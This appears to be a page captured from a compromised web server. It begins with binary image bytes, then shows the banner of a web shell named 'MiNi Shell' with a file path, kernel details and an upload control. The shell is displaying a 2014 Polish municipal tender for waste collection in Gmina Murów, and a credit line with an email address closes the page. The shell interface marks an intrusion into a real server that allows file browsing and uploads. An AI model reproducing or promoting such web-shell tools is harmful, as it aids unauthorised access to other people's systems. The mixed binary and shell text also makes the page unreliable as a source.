JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140319/92276-N-2014.html

<p class="kh_header"><b>Murów: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Murów.</b><br>
<b>Numer ogłoszenia: 92276 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murów , ul. Dworcowa 2, 46-030 Murów, woj. opolskie, tel. 0-77 4214034, faks 0-77 4214032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Murów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych , niezamieszkałych i mieszanych z terenu Gminy Murów. 
Zamówienie nie obejmuje dostarczenia i ustawienia pojemników dla właścicieli nieruchomości zamieszkałych i niezamieszkałych.
2.Przedmiot zamówienia obejmuje m.in.:
   -odbiór i zagospodarowanie  odzysk lub unieszkodliwienie odpadów komunalnych 
     powstałych na wszystkich nieruchomościach  zamieszkałych , niezamieszkałych 
     i mieszanych  na których powstają odpady komunalne, na terenie Gminy Murów
   -zbiórkę odpadów komunalnych niesegregowanych  zmieszanych,
   - zbiórkę odpadów gromadzonych selektywnie typu: makulatura, tworzywa 
     sztuczne w tym opakowania PET i puszki po napojach, szkło oraz opakowania 
     ze szkła za wyjątkiem stłuczki szklanej, zbieranych w  workach  i pojemnikach 
    - zbiórkę odpadów budowlanych i rozbiórkowych,
    - zbiórkę odpadów niebezpiecznych powstających w gospodarstwach 
      domowych typu: zużyte baterie i akumulatory, chemikalia, przeterminowane 
      leki, z wyłączeniem zużytego sprzętu elektronicznego zawierającego 
       substancje niebezpieczne,
    - zbiórka mebli i innych odpadów wielkogabarytowych, zużyty sprzęt 
      elektryczny i elektroniczny oraz zużytych opon,
    - odzysk lub unieszkodliwienie zebranych odpadów komunalnych,
    - zbiórka odpadów ulegających biodegradacji powstające w gospodarstwach 
      domowych
    -wyposażenie nieruchomości nieodpłatnie w worki plastikowe  nie będące 
      pojemnikami w rozumieniu ustawy o utrzymaniu czystości i porządku w 
      gminach na odpady segregowane,
    - wywóz odpadów komunalnych realizowany będzie na rzecz Gminy Murów-
      w zakresie zawartych przez Gminę umów na świadczenie usług wywozu 
     odpadów komunalnych. Niesegregowane odpady komunalne oraz segregowane 
     odpady komunalne powinny być poddane odzyskowi lub unieszkodliwianiu na 
     obszarze województwa opolskiego, w instalacjach spełniających wymagania 
     najlepszej dostępnej techniki lub technologii, o której mowa w art. 143 ustawy 
      z dnia 27 kwietnia 2001r. Prawo ochrony środowiska ( Dz. U. Nr 99, poz. 56 z 
      późn. zm.),
   - opracowanie i dostarczenie właścicielom nieruchomości harmonogramu odbioru 
      poszczególnych rodzajów odpadów,
   - prowadzenie i przekazywanie do Zamawiającego dokumentacji objętej 
     zamówieniem,
   - odbiór i zagospodarowanie odpadów winno się odbywać zgodnie z wytycznymi 
      Planu Gospodarki Odpadami dla Województwa Opolskiego na lata 2012-2017, 
      przepisami prawa polskiego oraz przepisami prawa miejscowego.

3.Dane ilościowe pozwalające ustalić cenę oferty: stan na dzień 1 luty 2014r
   - liczba mieszkańców, którzy będą objęci usługą odbierania odpadów 
      komunalnych stałych w Gminie Murów - około 4735osób zamieszkałych wg z
      łożonych deklaracji - stan na dzień  1.02.2014r
   - liczba  nieruchomości -1495 ( w tym zamieszkałych 1399, niezamieszkałych na 
     których powstają odpady komunalne  96)
   - liczba worków na selektywnie zbierane odpady komunalne papier i tektura, 
      szkło, tworzywa sztuczne:
- do gromadzenia frakcji odpadów: papier i tektura, opakowania wielomateriałowe 
   o pojemności 120 litrów - 1400 na miesiąc
- do gromadzenia frakcji odpadów: szkło o pojemności 120litrów - 1400 na miesiąc
- do gromadzenia frakcji odpadów: tworzywa sztuczne o pojemności 120litrów- 
   1400 na miesiąc
- liczba urządzeń do gromadzenia odpadów budowlanych i rozbiórkowych
   - worek big-bag pojemność 1m3 - 1.szt.
   - kontener ( pojemność 7m3 - 1szt.,
-  liczba pojemników do gromadzenia odpadów frakcji: szkło o pojemności 240l 
   5  na miesiąc 
- liczba pojemników do gromadzenia odpadów frakcji: tworzywa sztuczne- o  
   pojemności 240l-  5 na miesiąc
-  liczba pojemników do gromadzenia odpadów frakcji: papier o pojemności 240l - 
    4 na miesiąc
-  liczba pojemników do gromadzenia odpadów frakcji: papier o pojemności 1100l - 
    10 na miesiąc
- liczba pojemników do gromadzenia odpadów frakcji: szkło o pojemności 1100l-  
    9 na miesiąc 
-  liczba pojemników do gromadzenia odpadów frakcji: tworzywa sztuczne o
     pojemności 1100l - 9 na miesiąc 
-  liczba pojemników 120litrów przeznaczonych do gromadzenia odpadów     
    zmieszanych  - 1452
-   liczba pojemników 240litrów przeznaczonych do gromadzenia odpadów 
      zmieszanych  - 35
-  liczba pojemników 1100litrów przeznaczonych do gromadzenia odpadów 
      zmieszanych     - 87
-liczba pojemników 120litrów przeznaczonych do gromadzenia odpadów 
      ulegających biodegradacji- 5
-   liczba kontenerów 7m3 przeznaczonych do gromadzenia odpadów 
     zmieszanych - 4 
Podana liczba worków i pojemników do opróżnienia może ulec zmianie.
- przewidywana ilość odpadów komunalnych powstających na nieruchomościach 
      zamieszkałych i niezamieszkałych z terenu gminy Murów :
w tabeli przedstawiono liczbę (w Mg) odebranych odpadów komunalnych z terenu gminy Murów w latach 2010-2013
                                     
                             
                          2010r.                               2011r.           2012  2013r.          
                       ( bez spółdzielni             ( bez spółdzielni 
                       mieszkaniowej DOM)     mieszkaniowej DOM)
Odpady zmieszane	            650,0                    474,0            748,5     823,8
odpady wielkogabarytowe
( w tym opony oraz urządzenia
elektryczne i elektroniczne      6,0                     20,1              47,6       47,5
Papier i tektura                   14,2                     28,6               25,7       32,1
Szkło                                19,0                     30,6               38,3       60,3
Tworzywa sztuczne             12,2                     17,7               37,9       51,5
Odpady z budowy          brak danych                16,6               28,1       10,6
Odpady biodegradowalne        0                         0                    0           1,9
Złom                                   0                         0                    0            0
Leki                                    0                         0                    0        0,004
Łącznie:                           701,4                   587,6              926,1      1029,6

Ilość odpadów podana powyżej jest orientacyjna  i wynika ze sprawozdań przedkładanych Wójtowi Gminy Murów przez Przedsiębiorców  działających na terenie Gminy Murów. 

Szczegółowy opis przedmiotu zamówienia określa załącznik Nr 1 do SIWZ Szczegółowy opis przedmiotu zamówienia
Wykaz nieruchomości z których będą odbierane odpady komunalne oraz ilość pojemników i typ stanowi załącznik nr 2 do niniejszej  specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.40.00-3, 90.51.20.00-9, 90.51.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy z Wykonawców zobowiązany jest wnieść wadium w wysokości 8.300,00zł ( słownie: osiem tysięcy trzysta złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy:
Spełniają warunki określone w art. 22  ust. 1 ustawy PzP, dotyczące:
posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; tj.:
- posiadają zezwolenie na prowadzenie działalności w zakresie transportu 
i zbierania odpadów, wydane przez właściwy organ;
- posiadają wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny 
i elektroniczny, prowadzony przez Głównego Inspektora Ochrony Środowiska;
- posiadają wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Murów;
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów i oświadczeń przez Wykonawcę na zasadzie spełnia nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia jeżeli wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy w tym okresie wykonali lub wykonują należycie 
- co najmniej jedną usługę obejmującą  odbieranie odpadów komunalnych (zmieszanych i segregowanych) od właścicieli nieruchomości  w sposób ciągły   nieprzerwany przez okres  co najmniej 12 kolejnych miesięcy o wartości nie mniejszej niż  400 000zł brutto w ciągu roku.
Uwaga: wystarczające będzie wskazanie w wykazie oraz załączenie dowodów dotyczących usług w liczbie i w zakresie niezbędnym do wykazania spełniania wyżej opisanego warunku wiedzy i doświadczenia.
- w przypadku wykazania wartości należycie wykonanych lub wykonywanych usług 
w walutach innych niż PLN, Zamawiający przeliczy wykazane kwoty wg średniego kursu danej waluty, ogłaszanego przez Narodowy Bank Polski w dniu przesłania ogłoszenia o zamówieniu do Biuletynu Zamówień Publicznych
a jeżeli w dniu przesłania ogłoszenia o zamówieniu nie jest ogłaszany, to z pierwszego dnia, który poprzedza dzień ogłoszenia.

Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów i oświadczeń przez Wykonawcę na zasadzie spełnia nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do  wykonania zamówienia, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować samochodami do   odbioru  odpadów spełniającymi wymagania techniczne określone przepisami ustawy prawo o  ruchu drogowym oraz innymi przepisami szczególnymi (w tym rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w  zakresie odbierania odpadów komunalnych od właścicieli   nieruchomości (Dz. U. z 2013,    poz. 122), w celu realizacji zamówienia, w tym:
- minimum dwoma pojazdami do odbierania zmieszanych odpadów komunalnych 
z pojemników,
-minimum dwoma pojazdami do odbierania odpadów selektywnie zbieranych,
- minimum jednym pojazdem do odbierania odpadów ulegających biodegradacji,
-minimum jednym pojazdem z dźwigiem  do odbioru kontenerów 
z odpadami
-minimum jednym pojazdem do odbierania odpadów wielkogabarytowych.

Wykonawca musi posiadać bazę transportową z zapleczem techniczno-biurowym spełniającą wymagania przepisów budowlanych, sanitarnych i ochrony Środowiska. Baza  transportowa ma zapewnić możliwość garażowania taboru samochodowego na jej terenie,   a zaplecze techniczno- biurowe ma umożliwić kontakt Wykonawcy z przedstawicielem  Zamawiającego.
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów i oświadczeń przez Wykonawcę na zasadzie spełnia nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli  posiada ubezpieczenie od  odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie niższej niż  200 000,00zł ( słownie złotych: dwieście  tysięcy złotych).
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów i oświadczeń przez Wykonawcę na zasadzie spełnia nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie/ pełnomocnictwo do występowania w imieniu Wykonawcy dołączone wtedy o ile nie wynika z załączonych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę umowy w przypadku:
- zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno- prawną przekształceniem lub połączeniem z inną firmą,
- w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT ulegnie zmianie  wynagrodzenie Wykonawcy
- Niezależnych od stron Umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji przedmiotu Umowy .
- Zamawiający przewiduje również możliwość dokonania zmian i uzupełnień w  niniejszej  umowie, które nie stanowią istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru  wykonawcy ( zmianie zgodnie z dyspozycją art. 144 ustawy Pzp), z tym zastrzeżeniem, iż zmiany te wymagają zgody Wykonawcy i nie będą naruszać naczelnych  zasad udzielania zamówień publicznych, a w szczególności uczciwej konkurencji i równego traktowania Wykonawców oraz zmieniać zakresu i przedmiotu zamówienia oraz jego warunków i treści oferty.
- zmiany zakresu części zamówienia powierzonej Podwykonawcom, zmiany  Podwykonawcy lub wprowadzenia podwykonawcy, przy czym w/w zmiana  spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu      zamówienia. 
-zakres przedmiotu zamówienia wraz ze skutkami wprowadzenia takiej zmiany, przy czym  w/w zmiana spowodowana może być okolicznościami wynikającymi z regulacji prawnych wprowadzonych po dacie zawarcia umowy.
-Zmiany w obowiązujących przepisach prawa mających wpływ na n przedmiot i warunki umowy oraz zmiany sytuacji prawnej lub faktycznej Wykonawcy i lub Zamawiającego  skutkującej niemożliwością realizacji przedmiotu zamówienia.
- Zmiany może inicjować każda ze stron umowy wyłącznie w formie pisemnej, określając warunki jej dokonania, biorąc pod uwagę w szczególności:
- opis zmiany,
- uzasadnienie zmiany,
- czas wykonania zmiany,
- wpływ zmiany na termin zakończenia zamówienia.
- wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie za zgodą obydwu stron i stosownie uzasadnione, w formie pisemnej, pod   rygorem nieważności.

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. O zmianie należy poinformować Zamawiającego, nie później niż w terminie 3 dni od zaistnienia okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.murow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Murowie ul. Dworcowa 2 46-030 Murów pokój nr 19 nieodpłatnie. Na wniosek Wykonawcy Zamawiający prześle specyfikację pocztą wówczas pobierze tylko koszt przesyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2014 godzina 11:00, miejsce: Urząd Gminy w Murowie ul. Dworcowa 2 46-030 Murów pokój nr 10/ sekretariat/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com